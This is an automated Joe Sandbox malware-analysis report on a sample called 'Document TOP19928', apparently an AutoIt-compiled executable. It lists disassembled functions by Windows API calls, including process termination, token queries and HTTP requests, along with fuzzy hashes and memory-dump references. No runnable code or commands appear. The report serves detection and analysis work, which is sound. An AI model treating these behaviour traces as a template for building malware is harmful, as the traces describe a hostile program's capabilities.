Opcode Fuzzy Hash: 2b81b352c64a70d4a60b74c64c95dbce1e8ac6190ed898ad8025fdc8f46cba23
Instruction Fuzzy Hash: D2C13871508701DFC724EF24C889A6AB7E4FF84310F04496EF999973A2EB74E945CB92

Function 00828D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 008285F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00828608
Part of subcall function 008285F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00828612
Part of subcall function 008285F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00828621
Part of subcall function 008285F1: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00828628
Part of subcall function 008285F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0082863E

GetLengthSid.ADVAPI32(?,00000000,00828977), ref: 00828DAC
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00828DB8
RtlAllocateHeap.NTDLL(00000000), ref: 00828DBF
CopySid.ADVAPI32(00000000,00000000,?), ref: 00828DD8
GetProcessHeap.KERNEL32(00000000,00000000,00828977), ref: 00828DEC
HeapFree.KERNEL32(00000000), ref: 00828DF3

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Heap$Process$AllocateInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 169236558-0
Opcode ID: 27635c5077d20daa6309cf6d3c656474f7581feaf54193cb648820cd1fec8f51
Instruction ID: 36cfc516138ef8dc55fd11db59d41c6f5a6d512c6d2c6d5994c2e76a62ade7c7
Opcode Fuzzy Hash: 27635c5077d20daa6309cf6d3c656474f7581feaf54193cb648820cd1fec8f51
Instruction Fuzzy Hash: A811EE31542A14FFDF109FA4EC08BAE7BA9FF55316F108029E945D3291CB36A988CB60

Function 0085C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 007D12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 007D134D
Part of subcall function 007D12F3: SelectObject.GDI32(?,00000000), ref: 007D135C
Part of subcall function 007D12F3: BeginPath.GDI32(?), ref: 007D1373
Part of subcall function 007D12F3: SelectObject.GDI32(?,00000000), ref: 007D139C

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0085C1C4
LineTo.GDI32(00000000,00000003,?), ref: 0085C1D8
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0085C1E6
LineTo.GDI32(00000000,00000000,?), ref: 0085C1F6
EndPath.GDI32(00000000), ref: 0085C206
StrokePath.GDI32(00000000), ref: 0085C216

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 21b1d1d1276a338d1e3de623173b119c014a03478c64aebf1520191dcbc1b214
Instruction ID: e00c0b815107155f035c66a5ab46e22a3e195dc51599148f5f9a45ea5de9f772
Opcode Fuzzy Hash: 21b1d1d1276a338d1e3de623173b119c014a03478c64aebf1520191dcbc1b214
Instruction Fuzzy Hash: CC111E7640020CBFDF129F90DC48E9A7FADFF04395F048061BA18961A2D7729D55DFA0

Function 007F03A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 007F03D3
MapVirtualKeyW.USER32(00000010,00000000), ref: 007F03DB
MapVirtualKeyW.USER32(000000A0,00000000), ref: 007F03E6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 007F03F1
MapVirtualKeyW.USER32(00000011,00000000), ref: 007F03F9
MapVirtualKeyW.USER32(00000012,00000000), ref: 007F0401

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 1b767aead68275efb369a0a3c06028964213043c77add43bd03a685e539eb7dc
Instruction ID: 013104a061c85d5d0551f969749005f273b7dde5f8e45d9bef76f6aa3116bbdb
Opcode Fuzzy Hash: 1b767aead68275efb369a0a3c06028964213043c77add43bd03a685e539eb7dc
Instruction Fuzzy Hash: 6A016CB09017597DE3009F5A8C85B52FFE8FF19354F00411BA15C47942C7F5A864CBE5

Function 0083568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0083569B
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 008356B1
GetWindowThreadProcessId.USER32(?,?), ref: 008356C0
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008356CF
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008356D9
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008356E0

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 1e4bfb714c5c470d5dd6394b9daf59b32ee39e0cf56627e900a1f8d505b5c539
Instruction ID: 477126330fe19c1200e8e8547e6c1fff7a6a09ee9d938f0f9f7eadfaeee93f65
Opcode Fuzzy Hash: 1e4bfb714c5c470d5dd6394b9daf59b32ee39e0cf56627e900a1f8d505b5c539
Instruction Fuzzy Hash: DCF01231141658BBE7215B529C0DEEB7F7CFBD6B12F000169FB05D105196A51A0186B5

Function 008374D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 008374E5
RtlEnterCriticalSection.NTDLL(?), ref: 008374F6
TerminateThread.KERNEL32(00000000,000001F6,?,007E1044,?,?), ref: 00837503
WaitForSingleObject.KERNEL32(00000000,000003E8,?,007E1044,?,?), ref: 00837510

Part of subcall function 00836ED7: CloseHandle.KERNEL32(00000000,?,0083751D,?,007E1044,?,?), ref: 00836EE1

InterlockedExchange.KERNEL32(?,000001F6), ref: 00837523
RtlLeaveCriticalSection.NTDLL(?), ref: 0083752A

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: b1f53bf2663d7056870364da5b4c106c2cf4854a12a41162e47f817cff1162e5
Instruction ID: 5df2ceed67c9ce73f48bf2a76245dca92d0a12d55f98a2bc43606be0ab918098
Opcode Fuzzy Hash: b1f53bf2663d7056870364da5b4c106c2cf4854a12a41162e47f817cff1162e5
Instruction Fuzzy Hash: 1FF03ABA141712ABEB122B64EC8CAEB772AFF45303F500531F202914A2DB795815CA90

Function 00848902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00848928
CharUpperBuffW.USER32(?,?), ref: 00848A37
VariantClear.OLEAUT32(?), ref: 00848BAF

Part of subcall function 00837804: VariantInit.OLEAUT32(00000000), ref: 00837844
Part of subcall function 00837804: VariantCopy.OLEAUT32(00000000,?), ref: 0083784D
Part of subcall function 00837804: VariantClear.OLEAUT32(00000000), ref: 00837859

Strings

AUTOIT.ERROR, xrefs: 00848A3D
Incorrect Parameter format, xrefs: 00848960, 00848B22

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 19fd732a0bcf5697ab356f1ea42d90022e0bb516cd692fe9e4f552201a598664
Instruction ID: 5e0b7c7e234725417d6ab3f3bd574970bf247f672e0b9ae975d989e0dc7b8997
Opcode Fuzzy Hash: 19fd732a0bcf5697ab356f1ea42d90022e0bb516cd692fe9e4f552201a598664
Instruction Fuzzy Hash: A1912371608705DFC714EF28C48496ABBE4FB88314F04896EF99ACB362DB30E945CB52

Function 00832F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007EFEC6: _wcscpy.LIBCMT ref: 007EFEE9

_memset.LIBCMT ref: 00833077
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008330A6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00833159
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00833187

Strings

0, xrefs: 00833063

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 9bf34dfd3eec76c26f61b9dcbdd95afbfc17161308e4efef4a7f96fb58ad3f9d
Instruction ID: 15a46d09a7295509980a00aa969f061ee64d342ef43bfc6a11c9e69071cfa418
Opcode Fuzzy Hash: 9bf34dfd3eec76c26f61b9dcbdd95afbfc17161308e4efef4a7f96fb58ad3f9d
Instruction Fuzzy Hash: 00519031609301AAD725AF28C849A6FBBE8FFC5354F040A2EF995D6291DB74CA4487D2

Function 00832C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00832CAF
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00832CCB
DeleteMenu.USER32(?,00000007,00000000), ref: 00832D11
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00896890,00000000), ref: 00832D5A

Strings

0, xrefs: 00832CA4

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: c04018cbf56abe6e02798b803221a19264bc38bdee09d6e0bfaa9bf7b40618a9
Instruction ID: dd25d06da8c527516f65d49f85f2d9deaaea554daee5db3df25bed4fb2b8ae01
Opcode Fuzzy Hash: c04018cbf56abe6e02798b803221a19264bc38bdee09d6e0bfaa9bf7b40618a9
Instruction Fuzzy Hash: C2417C30205346AFD724DF28C845B5ABBA8FFC5320F14466EE965D72A1DB70E905CB92

Function 0084DAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0084DAD9

Part of subcall function 007D79AB: _memmove.LIBCMT ref: 007D79F9

Strings

winapi, xrefs: 0084DB4A
none, xrefs: 0084DBB4
stdcall, xrefs: 0084DB5B
cdecl, xrefs: 0084DB30

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 3e4fbb8ddc18881b9aed0b3b9e755d3ae0e53865e5ef8efdba303009a5401931
Instruction ID: d280e7d479053f21472691e2d54f00f4344cf49d8afec56bd62297033d3b350f
Opcode Fuzzy Hash: 3e4fbb8ddc18881b9aed0b3b9e755d3ae0e53865e5ef8efdba303009a5401931
Instruction Fuzzy Hash: EA31837060071EDBCF14EF94C8819BEB7B4FF55320B108A2AE965E7791DB75A905CB80

Function 00829372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007D7F41: _memmove.LIBCMT ref: 007D7F82

Part of subcall function 0082B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0082B0E7

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 008293F6
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00829409
SendMessageW.USER32(?,00000189,?,00000000), ref: 00829439

Part of subcall function 007D7D2C: _memmove.LIBCMT ref: 007D7D66

Strings

ComboBox, xrefs: 00829380
ListBox, xrefs: 008293B5

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 2c858d549715673558b7c7fca271172aa42d4ccfdf84a6ab181dc5a8466a445b
Instruction ID: 107df6f7140553940b59171027b3b2b86ef8941d7268fe7bf288f5a546ed2805
Opcode Fuzzy Hash: 2c858d549715673558b7c7fca271172aa42d4ccfdf84a6ab181dc5a8466a445b
Instruction Fuzzy Hash: FB21D271900118BBDB18AB64EC8ACFFB7B8EF45350F14412AF965D73E1DB39094AD610

Function 00841B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00841B40
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00841B66
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00841B96
InternetCloseHandle.WININET(00000000), ref: 00841BDD

Part of subcall function 00842777: GetLastError.KERNEL32(?,?,00841B0B,00000000,00000000,00000001), ref: 0084278C
Part of subcall function 00842777: SetEvent.KERNEL32(?,?,00841B0B,00000000,00000000,00000001), ref: 008427A1

Strings

, xrefs: 00841B87

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: ecceadac415f7738ad1ab512fdef4f52d5d0227ab4247fc368948cc9aa89f455
Instruction ID: 91094d7228b9a18477f744640da34074019947c395bef32f3f6e1eecaa4b5fa9
Opcode Fuzzy Hash: ecceadac415f7738ad1ab512fdef4f52d5d0227ab4247fc368948cc9aa89f455
Instruction Fuzzy Hash: FE21BBB160030CBFEB119F249CC9EBB76ECFB89768F10012AF505E2240EB249D449761

Function 00856656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 007D1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007D1D73
Part of subcall function 007D1D35: GetStockObject.GDI32(00000011), ref: 007D1D87
Part of subcall function 007D1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 007D1D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 008566D0
LoadLibraryW.KERNEL32(?), ref: 008566D7
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 008566EC
DestroyWindow.USER32(?), ref: 008566F4

Strings

SysAnimate32, xrefs: 008566AB

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: d5c14e84d50d06e670d3f35b46fae824df94c4cfdd965f70d8c5de8c94bea3af
Instruction ID: 91ae1347d99fc14024ea29766226de6539755e81abae055cb58d3d2395661ac3
Opcode Fuzzy Hash: d5c14e84d50d06e670d3f35b46fae824df94c4cfdd965f70d8c5de8c94bea3af
Instruction Fuzzy Hash: 31218E71200205ABEF108E64DC90EBB77EDFB6936AF904629FE11D3190E771DC659760

Function 0083703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 0083705E
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00837091
GetStdHandle.KERNEL32(0000000C), ref: 008370A3
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 008370DD

Strings

nul, xrefs: 008370D8

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: fce7219b49b43264f41471e2a9cb12015fbc3ec4b0e36b1e2881a7cd24ae6b5b
Instruction ID: 8e4a476a1406b9cd8c5af259aa01dc216c1ea18cb3e4989680ed2b8f80a66111
Opcode Fuzzy Hash: fce7219b49b43264f41471e2a9cb12015fbc3ec4b0e36b1e2881a7cd24ae6b5b
Instruction Fuzzy Hash: 13218EB4504709ABDB34AF28DC15A9A77A8FF94725F208A19FDA0D72D0EB70D8508B91

Function 0083710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 0083712B
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0083715D
GetStdHandle.KERNEL32(000000F6), ref: 0083716E
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 008371A8

Strings

nul, xrefs: 008371A3

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: d2e20a887358a77eaf36785bc49220d0e638ffc2b17871f9a7992e7c2fd2a40e
Instruction ID: 6e45b80eb0f00a3e39c659d1f02a40c9089446dc30cf7ea702e70e7827466d0a
Opcode Fuzzy Hash: d2e20a887358a77eaf36785bc49220d0e638ffc2b17871f9a7992e7c2fd2a40e
Instruction Fuzzy Hash: A62160B6504309ABEF309F689C04A9EB7A8FF95724F204619FDA1D72D0EB70D8518BD1

